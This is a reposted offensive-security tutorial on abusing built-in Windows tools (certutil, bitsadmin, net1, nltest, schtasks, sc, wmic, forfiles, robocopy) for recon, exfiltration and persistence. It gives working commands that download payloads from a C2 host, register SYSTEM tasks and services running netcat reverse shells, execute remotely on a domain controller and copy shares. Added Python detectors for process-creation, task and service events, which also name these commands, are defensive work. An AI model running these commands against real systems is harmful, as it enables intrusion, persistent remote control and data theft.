National Cyber Warfare Foundation (NCWF)

PowerShell for Hackers – Survival Edition, Part 4: Flying Under the Radar

2026-03-03 15:03:27
milo
Red Team (CNA)
Built-in Windows tools can be abused for recon, persistence, and data exfiltration without introducing foreign tooling.

Welcome back, aspiring cyberwarriors!

A while ago, we introduced the idea of Living off the Land and looked at several built-in Windows binaries that can be abused to execute commands, load code, or inject DLLs into running processes. One of the more subtle techniques we touched on was the creation of new drivers. While this is not a new idea, it often blends in surprisingly well. Modern Windows systems already contain a large number of legitimate drivers, and a carefully placed one is unlikely to stand out during a quick inspection. The key lesson here is restraint. Staying within the normal behavior and boundaries of the operating system is often more effective than trying to be overly creative. In many cases, the simplest approach is also the quietest.

In this part, we move on to three practical pillars of Living off the Land: network reconnaissance, data exfiltration, and persistence. Together, these cover most of what is needed for real-world operations. There are, of course, far more advanced techniques that offer higher levels of stealth and sophistication, but they also require deeper expertise and are useful only in very specific situations. Even experienced pentesters rarely rely on them during everyday engagements.

Our goal here is practicality. We focus on approaches that are easy to remember, quick to apply, and based on tools and behaviors that already exist on a standard Windows system. By avoiding overly complex syntax and exotic tricks, you gain techniques that are more likely to be used correctly under pressure. If you want to go deeper into persistence on Windows, including both common and more advanced methods, you can explore our Basic and Advanced Persistence series, where these topics are covered in greater detail.

Network Recon and Exfiltration

With these binaries you can perform some basic recon and exfiltrate files.

certutil.exe

One of the most useful binaries for both downloading and moving data is certutil.exe. Microsoft designed this tool to manage certificates and convert file formats, but that same functionality can be repurposed to download arbitrary files.

Here, we are downloading a Base64 payload and then saving it as an executable. In PowerShell the two commands are chained with ; (in cmd.exe you would use & instead):

PS > certutil.exe -urlcache -split -f "http://c2/payload.b64" "temp.b64"; certutil -decode "temp.b64" "staged.exe"

You can also host files on a compromised Windows machine and exfiltrate them:

PS > certutil.exe -urlcache -split -f "http://target:443/passwords.txt" "passwords.txt"

[Figure: certutil download output]

This approach is stealthier than the well-known PowerShell Invoke-* cmdlets such as Invoke-WebRequest.

bitsadmin.exe

This tool relies on the Background Intelligent Transfer Service (BITS), which Windows Update and administrators normally use to move files quietly in the background without disrupting network performance.

When downloading files, you can make your traffic look like update traffic:

PS > bitsadmin.exe /transfer StealthJob /download /priority normal http://C2/enum.exe C:\Temp\enum.exe

[Figure: bitsadmin job creation]

It then starts downloading the file.

[Figure: bitsadmin transfer progress]

The command we entered creates a BITS job named StealthJob that downloads enum.exe from our C2 server to C:\Temp.

net.exe

When it comes to reconnaissance, few tools are as useful and as familiar as net.exe. System administrators rely on it for everyday tasks, and that familiarity works in our favor. With simple commands, it is possible to enumerate network shares, query domain users, and gather information about the environment. If defenders are filtering or monitoring the net command specifically, its lesser-known twin, net1.exe, can often be used instead. Functionally, the two behave the same, but net1 is sometimes overlooked by basic detection rules.

View shares on a remote computer:

PS > net view HOST

[Figure: viewing shares with net]

View domain user information:

PS > net1 user Administrator /domain

[Figure: net1 user output]

nltest.exe

For more targeted Active Directory discovery, nltest.exe is what you need. This tool is intended to query domain controllers and test trust relationships, and it does so without generating the kind of noise associated with aggressive scanning. Since the domain controller sits at the heart of any Active Directory environment, you need to identify it early.

Determine the DC name:

PS > nltest.exe /dsgetdc:dc.local

[Figure: nltest locating the DC]

The results show the name and IP address of the domain controller. If the domain name is unknown, systeminfo will usually reveal it. With this information, you can now use tools like Impacket or NXC. Tools such as PowerView.py also require the domain controller's name or its IP address.

ping.exe

Even something as basic as ping.exe has value beyond its obvious purpose. While administrators use it to test connectivity, it can also serve as a crude timing mechanism or even a basic beacon. In environments where systems are powered down aggressively after an incident, a host that periodically sends a ping can signal when it is back online and ready to be accessed again. In previous articles, we discussed how ping can be abused as a substitute for a sleep command by looping requests to localhost. With sufficient privileges, creative use of ping can even be wrapped into a service and turned into a persistence mechanism.

Here is the plain sleep substitute again; 60 requests to localhost take roughly a minute:

PS > ping.exe -n 60 127.0.0.1 > null.txt
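
Every command in this section is executed through a process launch, so process-creation telemetry is where a defender sees it first. The Python below is an added example for this article, not code from Hackers-Arise: it applies rules derived from the certutil, bitsadmin, net1 and nltest commands above to constructed Sysmon Event ID 1 style records (Image plus CommandLine). The rule names, severities and sample records are assumptions for the demo.

```python
"""Flag LOLBin download and recon command lines in process-creation telemetry.

Added example for this article, not the author's code. It takes Sysmon Event
ID 1 style records (Image, CommandLine) and applies rules derived from the
commands shown above: certutil with -urlcache/-decode, bitsadmin /transfer
with a URL, net1 used in place of net, and nltest /dsgetdc. All records below
are constructed for the demo, not captured from a real host.
"""
import re
from dataclasses import dataclass

# Constructed sample records: (Image, CommandLine).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe",
     r'certutil.exe -urlcache -split -f "http://c2/payload.b64" "temp.b64"'),
    (r"C:\Windows\System32\certutil.exe", r'certutil -decode "temp.b64" "staged.exe"'),
    (r"C:\Windows\System32\certutil.exe", "certutil -verify cert.cer"),  # benign
    (r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin.exe /transfer StealthJob /download /priority normal "
     r"http://C2/enum.exe C:\Temp\enum.exe"),
    (r"C:\Windows\System32\net1.exe", "net1 user Administrator /domain"),
    (r"C:\Windows\System32\net.exe", "net view HOST"),
    (r"C:\Windows\System32\nltest.exe", "nltest.exe /dsgetdc:dc.local"),
    (r"C:\Windows\System32\ping.exe", "ping.exe -n 60 127.0.0.1"),  # benign
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # keeps a quoted path as one token


@dataclass
class Finding:
    image: str
    rule: str
    severity: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _switches(cmdline: str) -> set[str]:
    """Switch names in a command line, with their leading - or / removed."""
    return {t.lstrip("-/").lower() for t in TOKEN_RE.findall(cmdline)
            if t.startswith(("-", "/"))}


def classify(image: str, cmdline: str) -> list[Finding]:
    """Return zero or more findings for one process-creation record."""
    name = _basename(image)
    sw = _switches(cmdline)
    has_url = bool(URL_RE.search(cmdline))
    found = []
    if name == "certutil.exe":
        # -urlcache plus a URL is a download; -decode turns the blob into a file.
        if "urlcache" in sw and has_url:
            found.append(Finding(image, "certutil_urlcache_download", "high"))
        if "decode" in sw:
            found.append(Finding(image, "certutil_base64_decode", "medium"))
    elif name == "bitsadmin.exe":
        if "transfer" in sw and has_url:
            found.append(Finding(image, "bitsadmin_transfer_url", "high"))
    elif name == "net1.exe":
        # Low severity: net.exe itself delegates to net1.exe, so in production
        # pair this with a check that the parent process is not net.exe.
        found.append(Finding(image, "net1_direct_use", "low"))
    elif name == "nltest.exe":
        if any(s.startswith("dsgetdc") for s in sw):
            found.append(Finding(image, "nltest_dc_discovery", "low"))
    return found


def scan(events):
    """Apply classify() to every (Image, CommandLine) pair and flatten the results."""
    return [f for image, cmd in events for f in classify(image, cmd)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.severity:6} {f.rule:28} {f.image}")
```

In production the same records come from Sysmon Event ID 1 or from Security 4688, which only carries the command line when command-line auditing is enabled; without it, the certutil and bitsadmin rules have nothing to match on.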
Persistence

These tools create mechanisms that restart or re-run commands later.

schtasks.exe

Scheduled tasks are a classic example. They are old, well understood, and heavily used by both the operating system and third-party software. Because of this, they provide excellent cover. A scheduled task can be triggered on a timer, at logon, or in response to specific system events. This flexibility makes it easy to hide malicious execution among legitimate tasks. An attacker might schedule a reverse shell to run periodically, or delay execution for weeks to outlast an incident response effort. While task creation is logged and relatively easy to monitor, many environments generate so many scheduled tasks that individual entries are rarely scrutinized closely.

Here is an example from our Basic Windows Persistence article:

PS > schtasks /create /ru SYSTEM /sc MINUTE /MO 1 /tn persistence /tr "C:\tmp\nc.exe -e C:\windows\system32\cmd.exe 192.168.56.103 9001"

You can also schedule an executable:

PS > schtasks /create /tn "Update Service" /tr "C:\Windows\update.exe" /sc hourly /mo 5 /ru System

The first command registers a scheduled task named "persistence" that runs every minute as SYSTEM, executing nc.exe to spawn a reverse shell. The second, named "Update Service", runs a fake update.exe every five hours with the same SYSTEM privileges.

sc.exe

Services provide another persistence option. Using sc.exe, it is possible to create a new Windows service that runs automatically at boot. With enough privileges, an attacker can register a service that looks like routine system maintenance or installer activity. By configuring failure actions, the service can be set to restart automatically if it crashes, ensuring continued execution. Keep in mind that Windows logs service creation events (System log, Event ID 7045).

Although the same can be done with PowerShell, there are some caveats. We will use CMD for it instead (note that the space after binPath= and start= is required by sc's syntax):

C:\ > sc create persistence binPath= "nc.exe -e \windows\system32\cmd.exe C2 9001" start= auto

C:\ > sc failure persistence reset= 0 actions= restart/60000/restart/60000/restart/60000

C:\ > sc start persistence

Here you create a service called persistence that runs nc.exe to connect to your C2 on boot (start= auto). The failure command sets it to restart up to three times after failing, waiting 60 seconds (60000 ms) between attempts.
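
Both schtasks /create and sc create leave structured events behind: Security 4698 carries the full task XML (principal, triggers, action), and System 7045 records the service name, image path, start type and account. The Python below is an added defender-side example, not the article's code; it scores constructed copies of those two event types against the traits described above (SYSTEM principal, minute-level repetition, binary outside system directories, netcat-style host/port arguments, automatic start). The weights, threshold, trusted-directory list and sample events are assumptions for the demo.

```python
"""Score scheduled-task and service-install events for persistence traits.

Added example for this article, not the author's code. Input is Security
4698 (task registered, with TaskContent XML) and System 7045 (service
installed) events. Weights, threshold and the directory allow-list are
assumptions; the sample events are constructed to mirror the commands above.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed Security 4698 events.
SAMPLE_4698 = [
    {"TaskName": r"\persistence", "SubjectUserName": "operator",
     "TaskContent": r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT1M</Interval></Repetition></TimeTrigger></Triggers>
  <Principals><Principal><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions><Exec><Command>C:\tmp\nc.exe</Command>
    <Arguments>-e C:\windows\system32\cmd.exe 192.168.56.103 9001</Arguments></Exec></Actions>
</Task>"""},
    {"TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "SubjectUserName": "SYSTEM",
     "TaskContent": r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><ScheduleByWeek/></CalendarTrigger></Triggers>
  <Principals><Principal><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions><Exec><Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -o</Arguments></Exec></Actions>
</Task>"""},
]

# Constructed System 7045 events.
SAMPLE_7045 = [
    {"ServiceName": "persistence", "ImagePath": r"nc.exe -e \windows\system32\cmd.exe C2 9001",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "VendorAgent", "ImagePath": r'"C:\Program Files\Vendor\agent.exe" /service',
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

# Assumed allow-list of locations a task or service binary normally lives in.
TRUSTED_PREFIXES = ("c:\\windows\\", "%windir%\\", "%systemroot%\\", "c:\\program files")
NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe"}
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM", "LOCALSYSTEM"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')
DURATION_RE = re.compile(r"^P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?$")
PORT_TAIL_RE = re.compile(r"\s\d{2,5}\s*$")  # command line ending in a port number
FLAG_THRESHOLD = 4


@dataclass
class Verdict:
    name: str
    score: int
    reasons: list[str]

    @property
    def flagged(self) -> bool:
        return self.score >= FLAG_THRESHOLD


def _text(root, local):
    """First text value of an element named `local`, ignoring the XML namespace."""
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == local and el.text:
            return el.text.strip()
    return None


def _duration_seconds(value):
    """ISO 8601 duration (as used in task XML, e.g. PT1M) to seconds, or None."""
    m = DURATION_RE.match(value or "")
    if not m:
        return None
    d, h, mi, s = (int(x or 0) for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def _split_command(image_path):
    toks = [t.strip('"') for t in TOKEN_RE.findall(image_path)]
    return (toks[0] if toks else ""), " ".join(toks[1:])


def _score_exec(exe, args, hits):
    """Checks shared by tasks and services on the binary that will run."""
    if not exe.lower().startswith(TRUSTED_PREFIXES):
        hits.append(("binary outside trusted directories", 2))
    base = exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if base in NETCAT_NAMES and PORT_TAIL_RE.search(args):
        hits.append(("netcat-style binary with host/port arguments", 2))


def _verdict(name, hits):
    return Verdict(name, sum(w for _, w in hits), [r for r, _ in hits])


def score_task(ev):
    root = ET.fromstring(ev["TaskContent"])
    hits = []
    if (_text(root, "UserId") or "").upper() in SYSTEM_IDS:
        hits.append(("runs as SYSTEM", 1))
    secs = _duration_seconds(_text(root, "Interval"))
    if secs is not None and secs <= 300:
        hits.append((f"repeats every {secs}s", 2))
    _score_exec(_text(root, "Command") or "", _text(root, "Arguments") or "", hits)
    return _verdict(ev["TaskName"], hits)


def score_service(ev):
    hits = []
    if ev.get("StartType", "").lower().startswith("auto"):
        hits.append(("starts automatically at boot", 1))
    if ev.get("AccountName", "").upper() in SYSTEM_IDS:
        hits.append(("runs as LocalSystem", 1))
    exe, args = _split_command(ev["ImagePath"])
    _score_exec(exe, args, hits)
    return _verdict(ev["ServiceName"], hits)


def assess_all(task_events, service_events):
    return [score_task(e) for e in task_events] + [score_service(e) for e in service_events]


if __name__ == "__main__":
    for v in assess_all(SAMPLE_4698, SAMPLE_7045):
        print(("FLAG " if v.flagged else "ok   ") + f"{v.name} score={v.score} {v.reasons}")
```

The defrag task and the vendor agent both run as SYSTEM with automatic start, which is exactly why a single trait is worth only one point: it is the combination of a privileged principal, tight repetition and an unusual binary that separates the two persistence entries from everyday background noise.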
wmic.exe

While wmic.exe is commonly used to query system information, it can also execute processes remotely through WMI. This makes it useful for lateral movement once files have already been transferred to another host. When permissions allow it, WMI execution blends into normal administrative behavior, especially in environments where remote management is common.

PS > wmic.exe /node:"dc" process call create "cmd.exe /c C:\Temp\service.bat"

Here it connects to the domain controller (dc) and asks WMI to create a process that runs service.bat.

File Tools

These binaries are used to collect, compress, and move files.

forfiles.exe

The tool is typically used for maintenance tasks such as log cleanup, but it can be abused to execute a command for every file that matches a filter.

PS > forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c C:\Windows\System32\calc.exe"

This finds notepad.exe in System32 and runs calc.exe for each match. Because the spawned command appears as a child of forfiles.exe, a native system binary, it can be used to hide process launches behind a benign-looking parent.

robocopy.exe

Administrators rely on it for backups and file synchronization, which makes it a good choice for exfiltration during tests or attacks. When Robocopy copies entire directory trees or mirrors network shares, its behavior looks exactly like legitimate administrative work. It often blends into the background noise of normal operations.

PS > robocopy.exe \\manager-1\Documents C:\Sync /E

Here it copies the Documents share on manager-1 to C:\Sync. /E copies all subdirectories, including empty ones.
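
The three tools above are best caught by looking at process lineage rather than at any single command line: a remote wmic process call create lands on the target as a child of WmiPrvSE.exe, anything forfiles runs is a descendant of forfiles.exe, and robocopy reveals its direction through a UNC path in its source or destination argument. The Python below is an added example, not code from the article; it rebuilds parent/child chains from constructed Sysmon Event ID 1 style records and applies those three rules. PIDs, images and rule names are assumptions for the demo.

```python
"""Spot proxied execution and share copies from process lineage.

Added example for this article, not the author's code. It reconstructs
parent/child chains from Sysmon Event ID 1 style records and applies rules
derived from the wmic, forfiles and robocopy commands above. All records
are constructed; PIDs are arbitrary and never reused within the sample.
"""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation records (pid, parent pid, Image, CommandLine).
SAMPLE_PROCS = [
    Proc(50, 4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    Proc(100, 4, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe"),
    Proc(200, 100, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Temp\service.bat"),
    Proc(300, 50, r"C:\Windows\System32\forfiles.exe",
         r'forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c C:\Windows\System32\calc.exe"'),
    Proc(310, 300, r"C:\Windows\System32\cmd.exe", r"cmd /c C:\Windows\System32\calc.exe"),
    Proc(320, 310, r"C:\Windows\System32\calc.exe", r"C:\Windows\System32\calc.exe"),
    Proc(400, 50, r"C:\Windows\System32\Robocopy.exe", r"robocopy.exe \\manager-1\Documents C:\Sync /E"),
    Proc(500, 50, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),  # benign
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
SHELLS = {"cmd.exe", "powershell.exe"}


def _base(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def index(procs):
    return {p.pid: p for p in procs}


def ancestor_images(by_pid, pid, max_depth=32):
    """Basenames of the parent, grandparent, ... of `pid`, nearest first."""
    chain = []
    cur = by_pid.get(pid)
    while cur is not None and cur.ppid in by_pid and len(chain) < max_depth:
        cur = by_pid[cur.ppid]
        chain.append(_base(cur.image))
    return chain


def _robocopy_rule(cmdline):
    """Classify a robocopy command line by whether source or destination is a UNC path."""
    positional = [t.strip('"') for t in TOKEN_RE.findall(cmdline) if not t.startswith("/")]
    if len(positional) < 3:
        return None
    src, dst = positional[1], positional[2]
    src_unc, dst_unc = src.startswith("\\\\"), dst.startswith("\\\\")
    if src_unc and not dst_unc:
        return "robocopy_pull_from_share"
    if dst_unc and not src_unc:
        return "robocopy_push_to_share"
    return None


def classify(by_pid, proc):
    base = _base(proc.image)
    lineage = ancestor_images(by_pid, proc.pid)
    # A shell under WmiPrvSE.exe is how "process call create" arrives on a host;
    # local wmic use looks the same, so correlate with a network logon in practice.
    if base in SHELLS and "wmiprvse.exe" in lineage:
        return "wmi_remote_exec"
    if "forfiles.exe" in lineage:
        return "forfiles_proxy_exec"
    if base == "robocopy.exe":
        return _robocopy_rule(proc.cmdline)
    return None


def analyze(procs):
    """Map each flagged PID to the first lineage rule it triggers."""
    by_pid = index(procs)
    return {p.pid: r for p in procs if (r := classify(by_pid, p))}


if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_PROCS).items():
        print(pid, rule)
```

Note that the forfiles rule flags the grandchild calc.exe as well as the intermediate cmd.exe, because it walks the whole ancestor chain rather than checking only the direct parent; that is what keeps a one-level indirection like cmd /c from hiding the launch.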
Summary

Windows ships with a rich set of signed binaries that administrators depend on every day. When those same tools are abused, they can bypass simple allowlists and signature-based defenses. This forces defenders to shift their focus from individual events to behavior and context. With modest privileges, an attacker can perform reconnaissance, establish persistence and exfiltrate data with very few new artifacts on the system. Tracing this activity is difficult, especially in environments where logging is incomplete or inconsistently deployed.

If you want to learn how PowerShell can be used in both red team and blue team scenarios, we recommend signing up for our training taking place from March 10 to 12, 2026. It will be available to both Subscriber and Subscriber Pro students.

Source: HackersArise
Source Link: https://hackers-arise.com/powershell-for-hackers-survival-edition-part-4-flying-under-the-radar/


Copyright 2012 through 2026 - National Cyber Warfare Foundation - All rights reserved worldwide.